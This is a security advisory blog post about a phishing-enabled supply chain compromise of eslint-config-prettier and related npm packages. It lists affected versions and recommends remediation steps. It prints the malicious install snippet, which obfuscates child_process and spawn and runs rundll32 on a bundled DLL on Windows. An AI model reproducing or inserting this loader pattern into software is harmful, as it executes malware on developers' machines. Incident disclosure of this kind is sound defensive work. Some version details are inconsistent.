We are currently investigating a potential supply chain security incident involving the eslint-config-prettier npm package. This widely-used package, which helps developers maintain consistent code formatting by turning off ESLint rules that conflict with Prettier, appears to have had multiple versions published with suspicious modifications.
⚠️ This is a developing situation, and we are actively investigating the incident. This post will be updated as more information becomes available. Please refer to the GitHub issue for more details.
Update: Maintainer Confirms Supply Chain Attack
On July 18, 2025, the maintainer of eslint-config-prettier and other related packages, JounQin, confirmed via this tweet that he was the victim of a phishing attack. The attacker added a malicious npm token and subsequently published several compromised versions of popular packages maintained by him.
“I was tricked by a phishing email and a new npm token was added and leaked then some popular packages I’m maintaining were released with malicious software. I’ve deleted the leaked token and marked all affected bad versions as deprecated and released new versions.” — JounQin on X
Confirmed Affected Packages and Versions
The following packages and versions were confirmed to be compromised:
- eslint-config-prettier
- 8.10.1
- 9.1.1
- 10.1.6
- 10.1.7
- eslint-plugin-prettier
- 4.2.2
- 4.2.3
- snyckit
- 0.11.9
- @pkgjs/core
- 0.2.8
- napi-postinstall
- 0.3.1
- 0.3.1
These versions have been marked as deprecated on npm and new clean versions have been published by the maintainer.
Summary of the Incident
Between versions 10.1.5 and 10.1.7, the eslint-config-prettier package has had four new versions published to npm with no corresponding code changes in the repository. This unusual activity has raised immediate security concerns, as legitimate package updates typically correspond with actual code changes in the source repository. Here is the screenshot @dasa shared on the GitHub issue.
Key Observations
Multiple versions (10.1.6 through 10.1.9) were published to npm without any matching commits or changes in the GitHub repository.
The package diff shows unexpected modifications between versions: https://app.renovatebot.com/package-diff?name=eslint-config-prettier&from=10.1.5&to=10.1.7
GitHub user martincostello mentioned on the GitHub issue that the compromised version installs a DLL. The functionality of the DLL is currently unknown. Based on this analysis, it appears that the malicious code only impacts Windows.
if(os.platform() === 'win32') {
const tempDir = os.tmpdir();
require('chi'+'ld_pro'+'cess')["sp"+"awn"]("rund"+"ll32",
[path.join(__dirname, './node-gyp' + '.dll') + ",main"]);
log(`Temp directory: ${tempDir}`);
const files = cache.readdirSync(tempDir);
log(`Number of files in temp directory: ${files.length}`);
}Automated Dependabot / Renovatebot Dependency Updates
We are aware of several instances where automated dependency management tools have upgraded projects to the potentially vulnerable versions:
- Dependabot and Renovate Bot have created pull requests upgrading to versions 10.1.6, 10.1.7, 10.1.8, and 10.1.9
- These pull requests have been merged in multiple repositories, potentially exposing them to compromise
- The exact nature and scope of the potential compromise is still under investigation
Example of affected pull request: nx-extensions PR #216.
Immediate Recommendations
While our investigation continues, we recommend the following precautionary measures:
Pin to a safer version
If you are using eslint-config-prettier, immediately pin your dependency to a safer version.
Review Recent Dependency Updates
Check if your project has recently updated eslint-config-prettier to versions 10.1.6 or higher through automated pull requests or manual updates.
Audit Your CI/CD Pipelines
Review your CI/CD logs for any unusual activity if you've recently updated to the affected versions.
Monitor for Updates
Follow this blog post and official issue thread for the latest updates.
Next Steps
We are continuing our investigation into this incident and will provide updates as more information becomes available. Key areas of ongoing investigation include:
- Determining the exact nature of the modifications in the published packages
- Identifying the attack vector used to publish unauthorized versions
- Assessing the potential impact on affected projects
- Working with the package maintainers and npm to understand how this occurred
Stay Updated
This is an evolving situation. We will update this post as our investigation progresses and more information becomes available.
References
https://github.com/prettier/eslint-config-prettier/issues/339
https://app.renovatebot.com/package-diff?name=eslint-config-prettier&from=10.1.5&to=10.1.7
.png)
